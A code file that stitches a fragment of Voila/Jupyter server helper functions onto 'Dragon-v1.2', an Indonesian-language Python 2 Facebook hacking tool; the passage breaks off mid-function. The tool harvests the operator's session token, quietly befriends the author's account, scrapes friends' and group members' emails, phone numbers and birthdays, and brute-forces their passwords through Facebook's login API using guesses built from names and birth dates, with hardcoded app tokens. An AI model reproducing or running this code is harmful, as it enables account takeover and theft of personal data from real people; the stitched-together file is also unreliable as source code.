SERVER_NAME = 'SERVER_NAME'
SERVER_PORT = 'SERVER_PORT'
SCRIPT_NAME = 'SCRIPT_NAME'
PATH_INFO = 'PATH_INFO'
QUERY_STRING = 'QUERY_STRING'
SERVER_SOFTWARE = 'SERVER_SOFTWARE'
SERVER_PROTOCOL = 'SERVER_PROTOCOL'
def get_server_root_dir(settings):
# notebook >= 5.0.0 has this in the settings
if 'server_root_dir' in settings:
return settings['server_root_dir']
# This copies the logic added in the notebook in
# https://github.com/jupyter/notebook/pull/2234
contents_manager = settings['contents_manager']
root_dir = contents_manager.root_dir
home = os.path.expanduser('~')
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
return root_dir
async def _get_query_string(ws_url: str) -> Awaitable:
async with websockets.connect(ws_url) as websocket:
qs = await websocket.recv()
return qs
def get_query_string(url: str = None) -> str:
"""Helper function to pause the execution of notebook and wait for
the query string.
Args:
url (str, optional): Address to get user query string, if it is not
provided, `voila` will figure out from the environment variables.
Defaults to None.
Returns: The query string provided by `QueryStringSocketHandler`.
"""
preheat_mode = os.getenv(ENV_VARIABLE.VOILA_PREHEAT, 'False')
if preheat_mode == 'False':
return os.getenv(ENV_VARIABLE.QUERY_STRING)
query_string = None
if url is None:
protocol = os.getenv(ENV_VARIABLE.VOILA_APP_PROTOCOL, 'ws')
server_ip = os.getenv(ENV_VARIABLE.VOILA_APP_IP, '127.0.0.1')
server_port = os.getenv(ENV_VARIABLE.VOILA_APP_PORT, '8866')
base_url = os.getenv(ENV_VARIABLE.VOILA_BASE_URL, '/')
url = f'{protocol}://{server_ip}:{server_port}{base_url}voila/query'
kernel_id = os.getenv(ENV_VARIABLE.VOILA_KERNEL_ID)
ws_url = f'{url}/{kernel_id}'
def inner():
nonlocal query_string
loop = asyncio.new_event_loop()
query_string = loop.run_until_complete(_get_query_string(ws_url))
thread = threading.Thread(target=inner)
try:
thread.start()
thread.join()
except (KeyboardInterrupt, SystemExit):
asyncio.get_event_loop().stop()
return query_string
def make_url(template_name, base_url, path):
# similar to static_url, but does not assume the static prefix
settings = {
'static_url_prefix': f'{base_url}voila/templates/',
'static_path': None # not used in TemplateStaticFileHandler.get_absolute_path
}
return TemplateStaticFileHandler.make_static_url(settings, f'{template_name}/{path}')
def include_css(template_name, base_url, name):
code = f'<link rel="stylesheet" type="text/css" href="{make_url(template_name, base_url, name)}">'
return jinja2.Markup(code)
def include_js(template_name, base_url, name):
code = f'<script src="{make_url(template_name, base_url, name)}"></script>'
return jinja2.Markup(code)
def include_url(template_name, base_url, name):
return jinja2.Markup(make_url(template_name, base_url, name))
def create_include_assets_functions(template_name, base_url):
return {
"include_css": partial(include_css, template_name, base_url),
"include_js": partial(include_js, template_name, base_url),
"include_url": partial(include_url, template_name, base_url)
}
|
Dragon-v1.2.py
|
#Dragon-v1.2 by Mr.BV
#Jangan Recode asw
import os, sys, time, random
from sys import exit as keluar
from time import sleep as waktu
from random import random as acak
from random import choice as pilih
from sys import stdout
from os import system
m = '\x1b[1;91m'
h = '\x1b[1;92m'
k = '\x1b[1;93m'
b = '\x1b[1;94m'
u = '\x1b[1;95m'
c = '\x1b[1;96m'
p = '\x1b[0m'
i = '\x1b[1;90m'
v = '\x1b[1;38;5;198m'
j = '\x1b[1;38;5;208m'
w = (m, v, j, p, k, b, u, c)
W = pilih(w)
def load():
l = 'B '
a = 'L'
g = 'A '
i = 'C '
n = 'K '
P = ' '
r = '. '
h = '. '
w = '. '
u = '. '
o = '. '
s = '. '
e = '. '
S = '. '
for z in range(90):
waktu(0.1)
stdout.write('\r [\x1b[1;36m' + l[z % len(l)] + a[z % len(a)] + g[z % len(g)] + i[z % len(i)] + n[z % len(n)] + P[z % len(P)] + r[z % len(r)] + o[z % len(o)] + s[z % len(s)] + e[z % len(e)] + S[z % len(S)] + P[z % len(P)] + r[z % len(r)] + S[z % len(S)] + u[z % len(u)] + w[z % len(w)] + h[z % len(h)] + '\x1b[1;37m]')
stdout.flush()
load()
import os, sys, time, random
from sys import exit as keluar
from time import sleep as waktu
from random import random as acak
from random import choice as pilih
from sys import stdout
from os import system
m = '\x1b[1;91m'
h = '\x1b[1;92m'
k = '\x1b[1;93m'
b = '\x1b[1;94m'
u = '\x1b[1;95m'
c = '\x1b[1;96m'
p = '\x1b[0m'
i = '\x1b[1;90m'
v = '\x1b[1;38;5;198m'
j = '\x1b[1;38;5;208m'
w = (m, v, j, p, k, b, u, c)
W = pilih(w)
def load():
l = 'D '
a = 'R '
g = 'A'
i = 'G '
n = 'O '
P = 'N '
r = '. '
h = '. '
w = '. '
u = '. '
o = '. '
s = '. '
e = '. '
S = '. '
for z in range(90):
waktu(0.1)
stdout.write('\r [\x1b[1;36m' + l[z % len(l)] + a[z % len(a)] + g[z % len(g)] + i[z % len(i)] + n[z % len(n)] + P[z % len(P)] + r[z % len(r)] + o[z % len(o)] + s[z % len(s)] + e[z % len(e)] + S[z % len(S)] + P[z % len(P)] + r[z % len(r)] + S[z % len(S)] + u[z % len(u)] + w[z % len(w)] + h[z % len(h)] + '\x1b[1;37m]')
stdout.flush()
load()
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def exit():
print '\x1b[1;91mExit!!!!'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
logo = '\x1b[1;97m\n\x1b[1;93mTools :\x1b[1;96mDragon-V1.2\x1b[1;97m\n\x1b[1;93mAuthor:Yoga Wira\x1b[1;97m\x1b[1;96m\x1b[1;97m \x1b[1;97m\n\x1b[1;93mTeam :\x1b[1;91mBrother Victory\n'
print '\x1b[1;96m /\ /--\ '
print '\x1b[1;96m _______/ \/ 1 '
print '\x1b[1;96m /\ /____ 1'
print '\x1b[1;96m 1-------/ /__| O / 1'
print '\x1b[1;96m \--------____ / / '
print '\x1b[1;96m v v v v v \ \_____/ \ 1 '
print '\x1b[1;96m /\/\/\/\/\ / \ '
print '\x1b[1;96m /_______________ / '
print '\x1b[1;96m *Dragon-V1.2* \ / '
print '\x1b[1;96m \ Dark-Fb\ \ / '
print '\x1b[1;96m /Author:Yoga wira\/ '
os.system("figlet MicroClone |lolcat")
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[0m\n............ \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
os.system("figlet Dragon-v2 |lolcat")
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\x1b[1;96m================ \x1b[1;92mLOGIN WITH FACEBOOK\x1b[1;96m==============='
print '\x1b[1;97m\n\x1b[1;93m=Tools 100% Save No Keylogger='
id = raw_input('\x1b[1;97m\n\x1b[1;93m=> \x1b[0m\nE mail :\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;97m\n\x1b[1;93m=> \x1b[0m\nPassword :\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
os.system('xdg-open https://www.facebook.com/rendi.andika.3133')
time.sleep(2)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak ada koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print '\n\x1b[1;91m[!] Login Gagal'
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Tidak ada koneksi'
keluar()
os.system('clear')
os.system("figlet Black Dragon |lolcat")
print '\x1b[1;96m /\ /--\ '
print '\x1b[1;96m _______/ \/ 1 '
print '\x1b[1;96m /\ /____ 1'
print '\x1b[1;96m 1-------/ /__| O / 1'
print '\x1b[1;96m \--------____ / / '
print '\x1b[1;96m v v v v v \ \_____/ \ 1 '
print '\x1b[1;96m /\/\/\/\/\ / \ '
print '\x1b[1;96m /_______________ / '
print '\x1b[1;96m *Dragon-V1.2* \ / '
print '\x1b[1;96m \ Dark-Fb\ \ / '
print '\x1b[1;96m /Author:Yoga Wira\/ '
print logo
print '\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90'
print '\x1b[1;97m account: \x1b[1;92m' + nama
print '\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90'
print '\x1b[1;37;40m[1]. Info'
print '\x1b[1;37;40m[2]. Crack Account Facebook'
print '\x1b[1;37;40m[3]. Bot Facebook '
print '\x1b[1;37;40mpress 0 To Exit'
print
pilih()
def pilih():
zedd = raw_input('\x1b[1;96mroot@Yoga Wira ')
if zedd == '':
print '\x1b[1;91mChose Now'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system('xdg-open https://www.facebook.com/yoga.wira.188')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mTidak ada'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor HP\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor HP\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mTanggal Lahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mTanggal Lahir\x1b[1;97m : \x1b[1;91mTidak ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m[1]. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m[2]. Multi Bruteforce Facebook'
print '\x1b[1;37;40m[3]. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m[4]. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m[5]. Yahoo Checker'
print '\x1b[1;37;40m[6]. Ambil id/email/hp'
print '\x1b[1;31;40mpress 0 to exit'
print
hack_pilih()
def hack_pilih():
hack = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Jangan kosong'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mTidak ada'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Akun target harus berteman dengan akun anda dulu !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mMemeriksa \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mMembuka keamanan \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu sebentar \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token tidak ditemukan'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Kembali'
print
pilih_super()
def pilih_super():
peak = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['first_name'] + '12345'
